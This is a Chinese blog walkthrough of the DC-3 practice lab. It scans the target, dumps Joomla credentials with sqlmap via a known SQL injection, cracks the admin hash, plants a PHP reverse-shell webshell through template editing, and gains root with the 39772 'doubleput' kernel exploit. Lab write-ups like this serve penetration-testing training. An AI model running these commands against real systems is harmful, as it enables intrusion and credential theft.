靶机 DC-3

最新推荐文章于 2024-07-09 21:13:53 发布
最新推荐文章于 2024-07-09 21:13:53 发布
阅读量293 收藏 1
点赞数 3
分类专栏: DC系列靶场 文章标签: centos linux bash
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_66299232/article/details/126873625
版权

环境准备

DC-3靶机链接:百度网盘 请输入提取码

提取码:pz03

虚拟主机网络连接模式:桥接模式

攻击机系统:Kali Linux2021.1

信息收集

1:使用以命令进行主机探测

ar-scan -l

2:对其主机进行详细的扫描发现只开放了80端口

nmap -sC -sV -p 1-65535 192.168.166.132

3:这里使用Joomscan扫描器来进行敏感信息收集

项目地址:https://github.com/OWASP/joomscan

直接用命令:git clone https://github.com/rezasp/joomscan.git

使用命令:joomscan --url http://192.168.166.132

4:发现Joomla版本号与后台管理地址,使用searchsploit查看是否有可以使用的EXP

5:可以看到有一个SQL注入漏洞,并使用以下命令查看详细信息

searchsploit -x php/webapps/42033.txt

漏洞利用

1:根据以上提示可以对其进行SQL注入

sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering]

sqlmap -u "http://localhost/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent  -p list[fullordering] ‐D joomladb ‐T "#__users" ‐C "username,password" ‐‐dump

2:使用john对其HASH进行破解

3:得出admin账户密码 扫描出来的登录界面

4:登录http://192.168.166.132/administrator/

用户名:admin 密码:snoopy

5:按照图片指示操作

:

6:并通过编辑模板来获取shell,写php-reverse-shell.php木马 (百度即可获得)

权限提升

1: kali开启监听 ,拼接路径触发木马来反弹shell,查了一通,并没 有价值信息。

2:这次查看系统版本,看有没有内核漏洞

cat /etc/*release

3:使用searchsploit搜索主机Ubuntu 16.04  有关提权漏洞

4:找到一个39772.txt ,查看他的位置

5:cat /usr/share/exploitdb/exploits/linux/local/39772.txt 用cat命令查看后,这边提供了操作方法还有利用工具的下载方法(一时感叹kali真屌!!)

6: 把靶机目录切换到/tmp目录下,进行下载39772.zip

7::再次我们使用39772进行提权,用unzip 解压39772.zip , 打开后发现俩个文件

tar -xvf exploit.tar //解压

./compile.sh

./doubleput

按照第五步的截图做就OK ,最后也是轻松拿下!!!

魏钦6666
关注
专栏目录
DC-3 靶机
weixin_63492470的博客
03-11 5492
DC-3 DC-3 | Five86 | DC Challenges (靶机下载地址) 环境:DC-3靶机地址:192.168.1.152 kali地址:192.168.1.176 都是桥接模式 1 .收集信息 nmap -sP 192.168.1.0/24 nmap -A 192.168.1.152 #发现joomla内容管理系统 访问 192.168.1.152 #发现 提示只有一个入口,让我们提权为root用户 知道网站用的是joomla cms,那我们就可以使用
靶机DC-8(详细渗透,适合新手渗透)
热门推荐
君莫hacker的博客
09-05 1万+
目录靶机DC-8 (详细渗透,适合新手渗透)0x01靶机描述0x02环境搭建1. 下载并导入靶机2. 查看网络适配器3. 启动靶机0x03靶机渗透一、 信息收集1. 主机发现2. 端口扫描3. 详细扫描4. 目录扫描5. gobuster目录扫描6. 网站指纹识别二、 漏洞挖掘手工sql注入1. 通过手工验证,此处url含有sql注入漏洞2. 判断字段数3. 判断显示位置4. 查看当前数据库5. 查找库d7db中所有的表6. 查找uesrs表中所有的列7. 查询表中的数据sqlmap自动化执行1. 查当前数
DC-3靶机
Flamingo1998的博客
02-16 501
DC-3靶机
靶机渗透DC-3
weixin_44801963的博客
11-01 297
文章目录一、环境准备KaliDC-3二、渗透步骤1、信息收集2、漏洞探测3、漏洞利用1、SQL注入漏洞利用2、任意文件执行漏洞4、权限提升5、Get flag三、Have Fun 一、环境准备 Kali DC-3 下载官网:https://www.five86.com/ 二、渗透步骤 1、信息收集 主机发现 目标端口扫描 访问80服务 网站指纹识别 Joomla CMS扫描 扫除管理员登录界面 . 2、漏洞探测 查询 joomla 3.7.0已知的漏洞 3、漏洞利用 1、SQL注入漏洞利用
vulnhub靶机dc-3
m0_52328368的博客
08-14 1356
dc-3靶机教程
靶机实战-DC-3
滕财然的博客
01-31 3137
DC-3靶机实战 文章目录DC-3靶机实战1、主机发现2、端口扫描及端口详细信息3、访问web服务(80端口)4、web渗透 没有IP时先修改靶机root密码,然后配置IP 参考链接: https://blog.csdn.net/u014717036/article/details/53455563 1、主机发现 目标ip:192.168.232.167 2、端口扫描及端口详细信息 只开放...
靶机DC-1 11111
最新发布
09-25
靶机DC-1 11111
靶机dc-3
wl0326ghb的博客
06-04 74
本机ip:172.20.10.4扫描网段:172.20.10.0/24。
vulnhub靶机DC-3 渗透笔记
liver100day的博客
06-17 279
DC-3 靶机渗透笔记 靶机环境搭建 攻击渗透机: kali IP地址:192.168.75.128 靶机DC-3 IP地址未知 靶机下载地址:https://www.vulnhub.com/entry/dc-32,312/
DC3-靶机
Au
08-22 4179
下载地址 这块填一下坑,上面那个链接有两个下载地址,本人是使用VMware虚拟机,下了第一个ova的导入,使用nmap扫,怎么也扫不到存活主机,一直以为是我本地环境的问题,最后没招了,准备重新下一个试试,然后到下载页面一看,作者已经被反馈过这个问题了,又做了一个新的VMware镜像,可以直接使用。 坑啊! 所以使用VMware的同学,下载第二个即可。 配置的环境: kali : 192.16...
DC3靶机
PigLL的博客
08-11 498
## 关于DC3 靶机实验 1.信息收集: 2.网站信息 在浏览器中访问DC3的IP 利用工具kali中的nikto做一个简单的信息识别 通过扫描可以看到一些目录 然后通过浏览器可以访问 然后利用joomla专用的扫描工具joomscan扫描 发现了joomla的版本和一些目录 通过kali中的工具searchsploit扫描joomla 3.7.0版本存在的漏洞 通过扫描发现了一个42033.txt文件 通过searchsploit 将42033文件下载到当前目录 查看42033文件 发现
DC3靶机
qq_40646572的博客
04-25 565
DC3靶机挑战
DC-3--vulnhub靶场
m0_46982383的博客
07-20 327
靶机地址:http://www.five86.com/downloads/DC-3.zip 网络:NAT目录1、主机发现2、使用joomscan3、searchsploit Joomla 3.7.04、 一句话木马获取shell,中国蚁剑连接上传文件5、提权准备6、msf监听获取shell,提权 7、总结,主机发现扫不出靶机地址......
靶场DC-3
好好学习
01-12 2748
vulnhub的DC-3靶场
靶机DC-3
摘星怪sec的blog
07-09 385
搭建可能出现的情况:第一次导入镜像失败,可以再次尝试若出现报错的情况,都能搜到攻略,在设置里边更改即可以上情况博主都遇到了,不过都能搜到攻略。
Vulnhub靶机实战——DC-3
冠霖L的博客
09-27 9153
靶机DC-3下载地址:https://download.vulnhub.com/dc/DC-3.zip 靶机DC-3VMware下载地址:https://download.vulnhub.com/dc/DC-3VMware.zip 注:开始将DC-3.ova文件导入VMware虚拟机,发现无法获取到靶机IP地址,作者在DC-3靶机下载页面提到可以下载已经搭建好的DC-3VMware,然...
渗透测试学习之靶机DC-3
xdbzdgx的博客
11-12 5025
1.下载靶机 本篇文章是DC靶机系列的第三篇,针对的是靶机DC-3,建议感兴趣的读者从DC-1开始练习,详细内容可以看我之前的文章。 DC-3的下载地址为DC: 3.2 ~ VulnHub。三个地址建议使用磁力下载,比较快。下载后解压为.ova文件,该格式可直接在VMware上打开,如果显示打开失败,点击重试即可成功,如果仍无法成功可百度、谷歌解决。 需要说明的是DC-3相较前两个靶机,它只有一个flag,便是最后一个flag,没有多余的提示了。 在VMware加载成功之后显示如下界面: 默.
靶机实战(DC-3)
weixin_45605313的博客
06-30 429
DC-3实验环境实验过程信息收集主机发现端口扫描服务发现目录扫描漏洞发现漏洞利用提权总结 实验环境 靶机DC-3 测试机:kali(IP:192.168.186.128),win10 实验过程 信息收集 主机发现 netdiscover -I eth0 -r 192.168.186.0/24 nmap -sn 192.168.186.0/24 arp-scan -l ,arp-scan 192.168.186.0/24 端口扫描 masscan -p 0-65535 --rate=100000 192
渗透测试靶机DC-3
prettyX的博客
11-30 898
goGoGO!!! 今天我们做DC-3。 : ) 0X00 环境准备 靶机下载地址:http://www.five86.com 攻击机 :Kali 可能会问靶机导入情况,这里有个小插曲,我们下面再说... 0X01 开始渗透 局域网主机发现 nmap获取信息 发现只开放了80端口,我们尝试访问,但是显示页面错误,和其他大佬的wp也不一致,经过判断,应...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值